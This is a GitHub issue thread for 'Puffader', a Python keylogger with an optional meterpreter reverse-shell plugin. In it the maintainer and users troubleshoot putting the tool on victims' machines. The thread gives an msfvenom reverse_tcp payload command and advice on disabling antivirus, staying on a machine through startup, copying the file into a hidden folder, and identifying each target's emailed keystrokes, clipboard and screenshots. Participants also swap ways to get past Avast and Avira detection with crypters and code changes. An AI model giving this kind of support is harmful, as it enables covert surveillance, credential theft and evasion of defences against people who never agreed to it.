[2018-05-22 18:07] XLuma commented on #51
@xp4xbox

[2018-05-22 19:08] xp4xbox commented on #51
You just need the raw shellcode, to generate it:

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f python`

it should generate something like:

[code]

so all you have to do is remove the `buf =` and `buf +=` so the final shellcode should be on a single line such as: `\x06\x06\0x85\0x04`.

[2018-05-22 21:01] XLuma commented on #51
I would need to install the msfvenom framework first right ?

[2018-05-22 21:01] XLuma commented on #51
Msfvenom*

[2018-05-22 22:10] xp4xbox commented on #51
Metasploit comes with msfvenom. So all you need to install is the [metasploit framework](https://windows.metasploit.com/metasploitframework-latest.msi).

btw you can edit your comments.

[2018-05-22 23:45] XLuma commented on #51
Alright, thanks for the help ! I’ll test it tommorow !
(And yeah just saw that lol)
And since you are here, do I need to do the same thing with your Python backdoor ?

[2018-05-23 00:03] xp4xbox commented on #51
No, my python backdoor is completely independent. It is basically my take on a smaller version of meterpreter.

[2018-05-23 02:38] XLuma commented on #51
Alright, thanks for the help ! Can’t wait to test those programs :p

[2018-05-24 00:42] XLuma commented on #51
When I'm attempting to run the command (or view options) I,m always getting this error

C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:117:in `generate_jar': android/apk/classes.dex not found (RuntimeError)
        from C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:38:in `generate'
        from C:/metasploit-framework/embedded/framework/lib/

[2018-05-24 00:57] xp4xbox commented on #51
I am not sure, probably antivirus deleted the files. Make sure to turn you antivirus off and re-install metasploit.

[2018-05-24 01:05] XLuma commented on #51
alright I'll try

[2018-05-24 02:03] XLuma commented on #51
disabled my antivirus and reinstalled
now I'm getting a different error from the previous

[2018-05-24 02:08] xp4xbox commented on #51
What's the error.

[2018-05-24 02:10] XLuma commented on #51
C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize': Invalid argument @ rb_sysopen - C:/metasploit-framework/embedded/framework/modules/payloads/singles/cmd/windows/download_exec_vbs.rb (Errno::EINVAL)
        from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `open'
        from C:/metasploit-framework/

[2018-05-24 03:23] XLuma commented on #51
finally got it to work ! just need to find my LPORT

[2018-05-24 12:04] xp4xbox commented on #51
Lport can be any valid port. Such as 4444.

[2018-05-24 13:53] XLuma commented on #51
Finally ! I succesfully builded the program to a .exe, I’ll test it

Thanks for the help !

[2018-05-24 21:54] XLuma commented on #51
So I tested on VM, I bet the program succesfully launched because a cmd openned for like 0.1 second

I setted the timer for 120 second and specified an email to save the logs

But after 120 seconds, no logs in the specified path and email
is there something i'm missing ?

[2018-05-24 22:00] xp4xbox commented on #51
I am not sure why, but you cannot currently save logs to disk and email, you must have one or the other. By default it will send to your email, check in your Gmail to make sure that you allowed access for less secure apps.

[2018-05-27 19:56] XLuma commented on #51
so I enabled everything and made sure acess for less secure app is enabled for the program, got it working but I'm not getting any logs... maybe it's because of the email (and also the storing option is via email no other option is enabled)

[2018-05-27 20:29] xp4xbox commented on #51
Make sure your username and password are entered correctly. Other than that, I am not sure.

[2018-05-27 23:54] XLuma commented on #51
Tested it on my own machine, it worked perfectly
Does the program work if used on other computers that have a different IP from where it has been compiled ?

[2018-05-28 00:13] xp4xbox commented on #51
IP has nothing to do with it, there have been problems in the past with py2exe and fresh operating systems.

[2018-05-28 01:23] XLuma commented on #51
So the PC must have been up for like 5-10 minutes for the program to be running well ?

[2018-05-28 02:08] xp4xbox commented on #51
No I mean PC's that haven't installed a lot of software such as Microsoft c++ packages.

[2018-05-28 02:16] XLuma commented on #51
Ooooh okay
Well thanks for the help ! Very appreciated
Oh and since you are there I’d like to ask

Would it be possible to make some kind of installer ? Currently even with the added to startup, if the victim deletes the .exe, the keylogger doesn’t have a point, so making a installer that « installs » the keylogger to a specific path without asking for a path so it is « hidden » would be more hand

[2018-05-28 13:25] xp4xbox commented on #51
I did do that, it doesn't work?

[2018-05-28 16:14] XLuma commented on #51
Adding the program to startup won’t work if the program is deleted right ?

[2018-05-28 16:38] xp4xbox commented on #51
It should since it copies itself tohidden folder.

[2018-05-28 17:04] XLuma commented on #51
Oh okay then
Thanks for the help, I’m now good :)

[2018-05-28 18:23] #51 closed, assigned to nobody

[2018-06-20 22:28] not3nough opened #52 "Don't work properly on non-english SO (windows)"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

Hi,

It seems that I can't properly use '´' accent´or '^' when pyHook is running. It seems that I can't properly use '^' accents when pyHook is running. My keyboard is non-english (spanish). Can't accentuate words too.

[2018-06-20 22:31] not3nough opened #53 "Show hostname in send mail"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

Would be great if the script can indicate the name of the machine (hostname) in the message title, from the email.

[2018-06-20 22:57] xp4xbox commented on #52
Unfortunately there is nothing I can do about this since it is related to the pyhook module.

[2018-06-20 22:57] xp4xbox commented on #53
I will implement this soon

[2018-06-21 22:52] kingexplosionMurder opened #54 "Meterpreter plug-in part"
OS [Windows 10]

After converting the puffader.py to .exe using setup.py , I found it in the dist folder.
I generated the raw Shellcode on command prompt using

 msfvenom.bat -f python -x86 -platform windows -p python/shell_bind_tcp

And then I got the payload size and in python and a long list of raw Shellcode, which I don’t know what to do with next.
I’m currently stuck here.

And can the puffad

[2018-06-21 22:52] kingexplosionMurder commented on #54
Sorry I’m a noob at this

[2018-06-21 23:48] kingexplosionMurder commented on #54
And I also can’t get the base64 Shellcode to generate or I don’t know how to

[2018-06-22 09:36] kingexplosionMurder commented on #54
Also does it still send the logs to the email even after the attacker shuts down.

[2018-06-22 22:44] kingexplosionMurder commented on #54
@xp4xbox

[2018-06-23 01:35] xp4xbox commented on #54
Puffader will still work without meterpreter plugin.

[2018-06-23 13:42] #53 closed, assigned to nobody

[2018-06-23 13:42] xp4xbox commented on #54
Wrong issue, ignore that reference. If you want help including the meterpreter plugin, just ask.

If the keylogger is running, then it will still send logs.

NOTE: On Github you can edit your messages.

[2018-06-23 13:43] #52 closed, assigned to nobody

[2018-06-23 20:38] kingexplosionMurder commented on #54
Alright,
Sorry I’m a bit new to this.
So what is the use of the meterpreter plug in?
And after following all of the instructions and creating the keylogger along with the meterpreter plug in, and I shut down my laptop, will I still receive the logs in the mail?

[2018-06-23 20:54] kingexplosionMurder commented on #54
Also I generated the Shellcode using the commands you suggested in another issue,
I copied it into the base64encoder .

So what I want to know is do I need to use setup.py to generate another exe file or do I encode it before generating the exe.

[2018-06-23 20:57] kingexplosionMurder commented on #54
Also will the standalone puffader without meterpreter plug-in be detected by AV?

[2018-06-24 14:08] xp4xbox commented on #54
The point of the meterpreter plugin is if you want to be able to open a reverse shell. It is optional. If you shut down your computer you will still receive logs. Once you edit the file with the meterpreter plugin code, you can then use the setup.py to generate it. Either way it should be undetectable.

[2018-06-24 23:00] kingexplosionMurder commented on #54
Alright!
More questions, can one exe file be used for multiple targets.
If yes, will it be specified in the logs to show it is from a particular target?

[2018-06-25 14:16] xp4xbox commented on #54
It can be used for multiple targets. If you look in the email subject, you will see the IP and computer name.

[2018-06-25 16:08] kingexplosionMurder commented on #54
Okay ,
So the clipboard data and clicks along with the keystrokes will be in the email also, yeah?

[2018-06-25 16:09] kingexplosionMurder commented on #54
Also what is the final size of the exe file?
I’m getting about 12.9MB which is kinda much.

[2018-06-25 21:12] kingexplosionMurder commented on #54
Also what is the other w9xpopen.exe file in the dist folder ?

[2018-06-25 23:03] xp4xbox commented on #54
If you enable clipboard logging and clicks it will. Unfortunately there is nothing I can do about the file size since this is python which requires the interpreter and all modules to be bundled with it. Ignore the w9xpopen.exe, you can delete it.

[2018-06-28 00:17] kingexplosionMurder commented on #54
Okay great
Another thing,
Will the keylogger still work when turned on if the target shuts down or restarts.

[2018-06-28 14:24] xp4xbox commented on #54
If you have the option add to startup set to true it will.

[2018-06-28 17:34] kingexplosionMurder commented on #54
Alright!
So I just tried it out and the keystrokes were sent in , but no clipboard data or screenshots .
No clicks also, what format will the mouse clicks come as?

[2018-06-28 19:31] xp4xbox commented on #54
They come as txt format, you can show me your setup lines to make sure that you enabled all the options correctly?

[2018-06-28 23:01] kingexplosionMurder commented on #54
[code]

thats basically all i did, i edited the first few lines and added the email and password, also chose email over storing locally, excluded the meterpreter plug in also.

[2018-06-29 00:15] kingexplosionMurder commented on #54
Also the target used the computer on the internet and still no keystrokes received, checked the task manager and puffader is still running.
But I haven’t received any keystrokes.

[2018-06-29 19:59] kingexplosionMurder commented on #54
Or could it be due to having multiple exe with the same email address and password to all of them?

[2018-06-29 20:40] xp4xbox commented on #54
It should work. Did you make sure to install all modules.

Try changing the melt to false, that might be the problem.

[2018-06-29 23:34] kingexplosionMurder commented on #54
All the modules were installed correctly, using cmd though.

So melt to false it is.
But the exe won’t disappear on execution if set to false, right?

[2018-06-30 20:06] xp4xbox commented on #54
Yeah. Actually I think the problem isn't that, it might be because you are using a timer, try setting it to false.

[2018-07-01 14:51] kingexplosionMurder commented on #54
Alright , so if I set the timer to false it will send when the characters hit 1000 right?

[2018-07-01 17:43] xp4xbox commented on #54
Yeah.

[2018-07-02 21:02] kingexplosionMurder commented on #54
I’ll get back to you after I test it out.

[2018-07-25 00:59] xp4xbox commented on #54
Any update on this.

[2018-07-30 16:45] Nisthar commented on #54
@xp4xbox Its not sending me emails. Is it still working? I can still see logs and screenshots in my temp folder

Anyway, great work with this repo.

[2018-07-30 16:50] Nisthar commented on #54
@xp4xbox Ok, my bad, i set the save to local option

[2018-08-01 11:30] Nisthar opened #55 "Don't use nodistribute or virustotal"
Hi,

This is not an issue. Many ppl are scanning the stub in nodistribute. Nodistribute distributes files to AV.
Pls don't scan with any online public scan sites.

[2018-08-01 14:45] #55 closed, assigned to nobody

[2018-08-01 16:36] Nisthar opened #56 "Any way to log remote errors?"
Currently, I get it working for some pc's. But it doesn't work on some machines.

Is there any way to log remote errors ?

[2018-08-01 20:32] xp4xbox commented on #56
ATM it is not.

[2018-08-03 05:41] Nisthar commented on #56
@xp4xbox The current problem is its not efficient. It doesn't work on some computers. It sometimes doesn't work on my computer. I checked my regedit. It has the key for running in the startup. But the app is not running.

So, it needs a way to ensure the connection doesn't lose or log the last time a computer has connected.

[2018-08-05 18:31] xp4xbox commented on #56
It is a bug with the program then and should be fixed. I am not sure why it would not work on some systems. Anyway it is possible to log errors, but only locally.

[2018-09-04 18:54] user568989 opened #57 "cannot import name GetKeyState"
When i tried to run the script after i installed all the modules i get this error :

Traceback (most recent call last):
  File "C:\Users\blabla\Desktop\Puffader-master\Puffader.py", line 15, in <module>

  from pyHook import GetKeyState, HookConstants
ImportError: cannot import name GetKeyState

any ideas?

[2018-09-04 21:00] xp4xbox commented on #57
Are you using python 2.7?

[2018-09-04 21:12] user568989 commented on #57
Yes 2.7.13

[2018-09-04 21:13] user568989 commented on #57
Why i get this error?

[2018-09-04 21:27] user568989 commented on #57
I see you added codes in the script i see now that you added modules...

Anyway is there a solution to my error?

[2018-09-05 19:27] user568989 commented on #57
Solved

[2018-09-06 00:51] xp4xbox commented on #57
How did you solve it

[2018-09-06 12:56] user568989 commented on #57
sorry for the delay could not check my email anyway i dont know how i
solved it i just downloaded puffader again of course i changed something i
dont know exactly how but i solved it ... need little bit to play with
these kind of script cause it does not work 100% as you want

i wanted to ask u if u r developing this script anyway ? or it will stay
like this for ever ..
i thought you can add some

[2018-09-06 19:10] xp4xbox commented on #57
I am still developing this when I am in the mood to. If you could find out what exactly you did to make it work that would be appreciated.

[2018-09-14 18:11] user568989 opened #58 "taking screenshots"
The script sends the screenshots to an email without a problem but when the script/pc takes a snapshot a small window of CMD is showed and closed after 1 sec..
the victim can realize that something run in his machine

[2018-09-14 18:59] xp4xbox commented on #58
hmm, shouldn't be. I will look into this.

[2018-09-14 21:49] user568989 commented on #58
I know that's not the place to ask this kind of question but maybe someone here knows..

I converted the puffader to exe and i uploaded him to the victim system the point is when i try to run the puffader.exe from netcat i get an error : no modile named ....
(Any kind of modules its can be _imaging, pyhook its not important)

How can i run a program converted to exe ( was py before) from remote ma

[2018-09-15 21:47] xp4xbox commented on #58
You have to build it in Windows. It cannot build in Linux.

[2018-09-15 21:48] #57 closed, assigned to nobody

[2018-09-15 21:49] #54 closed, assigned to nobody

[2018-09-15 21:50] user568989 commented on #58
I know but when i run the exe file i built in windows the reverse shell (kali linux) does nkt recognize some modules..

[2018-09-15 21:57] xp4xbox commented on #58
It can't run on Linux at all. The file has to be on a windows computer.

[2018-09-15 22:02] user568989 commented on #58
The file is on windows computer i just try to run it from attacker side by hacking to his system

[2018-09-16 13:38] xp4xbox commented on #58
Then it should work, why wouldn't it? If you can remotely execute a command to run it if the command passes it should be just like if the user clicked the file.

I tested it out and the screenshot does not show any cmd module. Try maybe updating pyscreeze.

[2018-09-21 15:08] xp4xbox commented on #58
Any update @user568989

[2018-09-28 22:39] kingexplosionMurder opened #59 "Detectable"
The keylogger hasn’t been working recently and it has become detectable, is there anything you can do about this.

[2018-09-29 16:29] xp4xbox commented on #59
Is the only problem that it has been detectable?

[2018-09-30 21:54] kingexplosionMurder commented on #59
Yes that’s all I’ve noticed for now

[2018-09-30 21:56] kingexplosionMurder commented on #59
It was detected by Avira

[2018-09-30 21:57] kingexplosionMurder commented on #59
Is there anything you can do about it being detectable

[2018-10-01 19:48] #58 closed, assigned to nobody

[2018-10-01 19:48] xp4xbox commented on #59
I am not sure.

Maybe someone could help.

[2018-10-05 22:37] Haskileto opened #60 "Adding photo"
**Hi, i'm kinda new to this sort of stuff but i would like you to help me, so i was seeing your code for school research, but i would like to know if i could add some photo?
I mean i would like to know if in this code i could get a photo to be opened and at the same time run your code. Is that possible?
Thanks in advance.**

[2018-11-01 15:09] user568989 commented on #59
A script like NXcreypt should do the trick its just add some junk code and it 100 FUD.. i dont know how long it will keep your file FUD but of course you need to run some tests..

[2018-11-01 15:17] user568989 opened #61 "Meterpreter connection.."
Is there a way to get meterpreter everytime the system reboots i mean if the victim run the puffader(puffader includes meterpreter)
The attacker will get keylogger keystrokes and meterpreter session but if the victim reboots the puffader will keep running and meterpreter won't

Is there a way to keep meterpreter running after the victim reboots cause puffader run correctly..

Also multiple clients

[2018-11-11 21:31] michalmarkus opened #62 "No content in the email"
I have a problem when I get emails - there is no content for this something like on the screen http://www.mediafire.com/view/467y4knauusq6ya/test.jpg/file

What's the problem ?

**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

[2018-11-11 22:39] xp4xbox commented on #59
it doesnt work with py2exe

[2018-11-11 22:39] #59 closed, assigned to nobody

[2018-11-11 22:41] xp4xbox commented on #60
Yeah that's very basic stuff, I recommend learning python before that.

[2018-11-11 22:41] #60 closed, assigned to nobody

[2018-11-11 22:43] xp4xbox commented on #61
It is not possible to do that since meterpreter is part of the Puffader process. If you want something like that, I recommend checking out my other project. https://github.com/xp4xbox/Python-Backdoor

[2018-11-11 22:43] #61 closed, assigned to nobody

[2018-11-11 22:44] xp4xbox commented on #62
I have never seen that before. I just tested it out and I dont have that problem. Try reinstalling all modules.

[2018-11-12 12:07] michalmarkus commented on #62
I made a new virtual machine with Win7 32Bit on which I installed python 2.7

The problem is the same - the email subject is correct and gives the IP and the host name,

I found a problem:
[code]

installed modules
[code]

[2018-11-13 16:04] xp4xbox commented on #62
Weird.

[2018-11-14 19:19] michalmarkus opened #63 "Avast alarm"
Avast raised the alarm about malware. Can you cheat him somehow?

**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

[2018-11-14 19:19] michalmarkus commented on #62
Ok the problem disappeared when I made compilations on Windows 10

[2018-11-14 22:39] #62 closed, assigned to nobody

[2018-11-14 22:41] xp4xbox commented on #63
I am not sure, it used to be undetectable. I have heard of this https://github.com/Hadi999/NXcrypt but it doesnt work when the file is compiled to .exe.

[2018-11-30 02:42] altalbot opened #64 "Victims Copy/Paste option?"
I noticed problem copying and pasting content on my test machine. I think the problem is there only when I set blnLogClipboard to True...
Is there any hope? :D

Regards

[2018-12-01 15:48] xp4xbox commented on #64
What is the problem?

[2018-12-02 21:36] xp4xbox commented on #64
I just tested it and it works fine for me. What os are you using.

[2018-12-04 00:53] xp4xbox commented on #64
Ok I am getting the same issue now.

[2019-01-08 12:13] MS-Jahan commented on #64
I'm facing it too.

[2019-01-08 13:22] xp4xbox commented on #64
Il look into it.

[2019-01-08 15:53] ghost opened #65 "32x system"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

Its not compatible with x86 systems ?

[2019-01-08 19:39] xp4xbox commented on #65
It is, I wrote the entire program on a 32 bit laptop.

[2019-01-10 19:55] #64 closed, assigned to nobody

[2019-01-21 14:16] #65 closed, assigned to nobody

[2019-01-24 08:19] telar3 opened #66 "Chrome Legacy Window"
Is there a way to log all visited Websites? I am only getting approx 2/10, the rest is displayed as "Chrome Legacy Window".

[2019-01-27 08:19] vladimirpe00 commented on #56
any error logs? so you can trace the issue?

[2019-01-27 08:29] vladimirpe00 commented on #63
you python crypter that can handle python code before it converted to exe besides try to modify your scri[t changing functions name in order to change the code signature it seems a lot of people are using it which flagged the code

[2019-01-28 21:15] ghost commented on #65
Operating System : Windows 7 32bit

This is Error Message:
` The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32bit) or x64 (64bit) version of the program, and then contact the software publisher `

Screenshot Link:
https://cdn1.imggmi.com/uploads/2019/1/29/8a783b738ed23a58bccb47c71722f60

[2019-02-03 21:21] veryyynice opened #67 "isn't urllib2 depricated?"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

when I try to run puffader with python 2.7 it says that there no module named urllib2

[2019-02-04 02:02] NicolasHawrysh commented on #67
Works last time I used it. Not sure

[2019-02-04 02:10] xp4xbox commented on #66
Nothing I can do about it, it is related to pyhook.

[2019-02-04 02:10] #66 closed, assigned to nobody

[2019-02-04 02:10] xp4xbox commented on #67
Worked last time I tried it.

EDIT: Works when I tried it today.

[2019-02-04 02:11] xp4xbox commented on #63
That would be up to the user

[2019-02-04 02:12] xp4xbox commented on #56
This is the problem with python, it's very unreliable.

[2019-02-04 17:35] ghost opened #68 "How can I send .doc file as attachment?"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

I am trying to mail .doc files but as i m new to python, can't figure the way out.
Kindly guide me.........

[2019-02-04 18:11] veryyynice commented on #67
I went and copied the original code from this repository and it worked..

[2019-02-04 18:13] veryyynice opened #69 "error with compiling puffader.py"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

when I compile Puffader.py with 'py -2.7 -B ./setup.py' it stops at *** byte compile python files *** ...
[code]

[2019-02-04 20:02] #67 closed, assigned to nobody

[2019-02-04 20:07] xp4xbox commented on #68
Like kinda like this.

[code]

[2019-02-04 20:09] xp4xbox commented on #69
Never got that error before, try re-installing python.

[2019-02-05 12:28] ghost commented on #68
Corrupted doc attachment. Can't open it
And Thanks for prompt reply.

[2019-02-05 19:48] xp4xbox commented on #68
You probably have to add, `f.close()` after the `attachment = MIMEText(f.read())`.

Also make sure you are using correct path.

[2019-02-06 02:43] ghost commented on #68
Again same error
i think that the file cannot be opened in text format.
any other way to send it
Thanks in advance

[2019-02-06 02:59] xp4xbox commented on #68
Maybe try opening file as byte. So `f = file(filename, "rb")`

[2019-02-06 12:59] ghost commented on #68
It's almost resolve but the attachment is still corrupted.
Instead the body of the email contain the matter present in .doc file

But it comes with lot of residue.
Thanks in advance

[2019-02-06 14:53] xp4xbox commented on #68
https://stackoverflow.com/questions/11921188/how-to-send-email-with-pdf-attachment-in-python

Here is how. Should work with doc.

[2019-02-06 14:53] #68 closed, assigned to nobody

[2019-02-06 15:28] ghost commented on #68
Thanks,
Solved

[2019-02-08 17:41] ghost opened #70 "Help regarding py2exe"
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

I want to compile this script and make an .exe program but can't figure out the setup script.
My code is as follow:
#############################################################################
import time,os,subprocess,shutil,string
import dropbox
import win32console, win32gui, win32event
from dropbox.files import WriteMode
from ctypes i

[2019-02-08 17:45] JashmanSingh commented on #70
can you please create a setup script that i can use to compile this.......

[2019-02-10 12:53] JashmanSingh commented on #70
@xp4xbox Sir please reply...

[2019-02-11 13:08] #70 closed, assigned to nobody

[2019-02-15 05:49] ghost opened #71 "Ports available to send email."
**OS:** [e.g. Windows 10]
**Commit/Build:** [e.g. b227928]

I am trying to run puffader on 4 different machines on the same network but using port 465 on all of them isn't helping.

Problem: Only one of them is sending emails.

I searched for the ports that i can use but stuck on only two(465 and 587)

Can you provide solution to this Problem.
Please respond ASAP.....It's little urgent.

[2019-02-15 19:39] #69 closed, assigned to nobody

[2019-02-15 19:40] xp4xbox commented on #71
The port should not change, that is probably not that problem.

[2019-02-16 10:20] ghost commented on #71
Thanks for responding..
All of them use different emails.
Can this be the problem.

Rest all the code is same....

[2019-03-07 01:31] #71 closed, assigned to nobody

[2019-04-06 02:05] JashmanSingh commented on #27
Can it rely on computer's date and time?

[2019-04-06 02:11] ghost commented on #63
Bitdefender alarms too.
But after I turned the addtostartup to false, it was fixed.

Antivirus is assuming it to be worm(as it is copying itself).

[2019-04-06 18:21] xp4xbox commented on #63
Yeah, there is nothing I can do about it.

[2019-04-07 02:10] ghost commented on #63
Can't you make a shortcut in startup folder instead of moving the exe file?
I think this can help

[2019-04-08 17:03] xp4xbox commented on #63
That would make it even more detectable

[2019-06-05 10:54] joker8989 opened #72 "Friend from the past"
xp4xbox ii dont know if u remmeber me i dont even have a name ,we have chatted on email with another guy from here tried to test/develop puffadder i was too busy to continue testing it (even now) but maybe u can help me and i can help, its about Python programming/make files encrypted(FUD-100%) ..

contact me: polyonpo9@gmail.com

[2019-06-07 12:49] xp4xbox commented on #72
I don't have any experience with encrypting files.

[2019-06-07 14:33] joker8989 commented on #72
So u know coding in python, do u have any idea how can i make my
base64(string) execute without using exec() built in function?
cause exec() returns None and i need a return value to be able to convert
it to exe..
??

[2019-06-07 15:00] xp4xbox commented on #72
Take a look at this. https://github.com/xp4xbox/PyEvade

[2019-06-07 18:43] joker8989 commented on #72
Sorry for sharing my problems, I have already base64("string") your github
project deals with a shellcode from msfvenom i see in your code that you
are encoding the shellcode and then decoding it while set it up in a
payload that will be converted to exe...

but i dont have a shellcode....

<http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webm

[2019-06-08 15:15] xp4xbox commented on #72
I don't know what ur trying to do then.

[2019-08-31 22:29] OH3Xs opened #73 "Compiling to exe errors."
OS: Windows 10

Hi, I'm currently getting this issue. I tried in any other PC/Laptop but it's still the same errors.

Sorry about this and this is my First time in Python. I hope you understand my situation.

Error Logs:
`C:\Users\Vane\Desktop\Puffader-master>python setup.py
running py2exe
Traceback (most recent call last):
  File "setup.py", line 11, in <module>
    zipfile = None,
  File "

C:\U

[2019-09-01 02:13] xp4xbox commented on #73
Your problem is your using python 3.7, this program only works with python 2.7

[2019-09-01 02:25] OH3Xs commented on #73
Thanks, it works now!

[2019-09-01 07:29] OH3Xs commented on #73
Btw why there are two exe files? and which one should be executed first? the Puffader one or w9xpopen?

[2019-09-01 15:39] xp4xbox commented on #73
w9xpopen can be deleted.

[2019-09-02 16:41] #73 closed, assigned to nobody

[2019-09-24 15:49] gagandeep1994 opened #74 "bundle-files 1 not yet supported on win64"
whenever i run python setup.py it throws a error saying bundle-files 1 not yet supported on win64
can you help?

[2019-09-24 23:43] xp4xbox commented on #74
When does this error show. After you configure all setings?

[2019-09-25 08:13] gagandeep1994 commented on #74
it doesn't start, i have installed everything. do i have to paste the setup.py and puffader.py in python27 folder C: ? i have tried that also and i have also tried running it from the puffader-master folder. sorry i'm new to python but yes i did all the installation like pyhook, py2exe, everything but when i run the setup.py file it shows me a error. maybe because i'm on win7 64 bit version?

[2019-09-25 09:00] gagandeep1994 commented on #74
Sir i have configure all the settings inside the puffader.py file (email id,pass, on which folder to save the ss and log file too, also "/" instead of "\"), and i followed all your steps.. i have installed everything, also allowed less secure apps. but it doesn't start. only error i'm getting is this and i also git clone as per your steps. sorry i'm new to python. this is the dir and when i run py

[2019-09-25 09:02] gagandeep1994 commented on #74
Sir i have configure all the settings inside the puffader.py file (email id,pass, on which folder to save the ss and log file too. i followed all your steps..maybe because i'm on win7 64bit version?? i have installed everything, also allowed less secure apps. but it doesn't start. only error i'm getting is this and i also git clone as per your steps. sorry i'm new to python. this is the dir and wh

[2019-09-25 12:10] #72 closed, assigned to nobody

[2019-09-25 12:11] xp4xbox commented on #74
Remove the line in setup.py that says bundlefiles:1

And the comma on the end of the line above it.

[2019-09-25 12:22] gagandeep1994 commented on #74
i removed the bundlesfiles :1 and also the comma and now it started but now it showing this
https://imgur.com/a/bNdpLe6

[2019-09-25 12:29] xp4xbox commented on #74
ok, i have a better idea, uninstall everything than reinstall everything using the 32bit downloads.

[2019-09-25 12:31] gagandeep1994 commented on #74
okay sir i will reinstall everything and let you know. thank you

[2019-09-25 13:59] gagandeep1994 commented on #74
i installed 32 bit version all of them.. and now it is not showing any sort of error. i hope it will work now.. after running setup.py there is dist folder that has been created. i can see .exe file. so this is it? thank you so much sir! which one exe to run ??
https://imgur.com/a/8NcJh5V

Edit : oh yes after double clicking puffader.exe i can see that running in background in task manager but can

[2019-09-25 14:32] xp4xbox commented on #74
yeah the other file can be deleted.

[2019-09-25 14:32] #74 closed, assigned to nobody

[2019-09-27 15:36] ipenywis opened #75 "Weird Logs Encoding that have been sent by EMail"
**OS:** Windows 10 Pro
**Commit/Build:** 17134.950

The loggin mechanisme is working but the problem is in the Encoding format of the sent logs by mail I get something like this
![image](https://user-images.githubusercontent.com/13965825/65782040-bad41e00-e144-11e9-83ab-6f6ce58e41f6.png)

Im testing it in my **English Windows 10 Pro** machine where I am typing in English.

Any suggestions of what

[2019-09-27 17:04] xp4xbox commented on #75
im not sure i never had that problem before.

[2019-09-27 17:59] #27 closed, assigned to nobody

[2019-09-27 17:59] #56 closed, assigned to nobody

[2019-09-27 18:00] #63 closed, assigned to nobody

[2019-09-27 18:01] xp4xbox commented on #75
Honestly, Python2.7 is a mess i recommend you check out https://github.com/xp4xbox/Python-Backdoor this project isnt really supported anymore.

[2019-09-27 18:01] #75 closed, assigned to nobody

[2019-09-27 20:58] ipenywis commented on #75
- I fixed the issue it was a **python 2.7**  with pyhooks issue which it returns non-ASCII  for  `event.ascii` so I had to modify the code to use `event.KeyID` which returns the **ASCII**  Representation of the event key.

Thanks for your help anyway.

I will check Python Backdoor it seems interesting.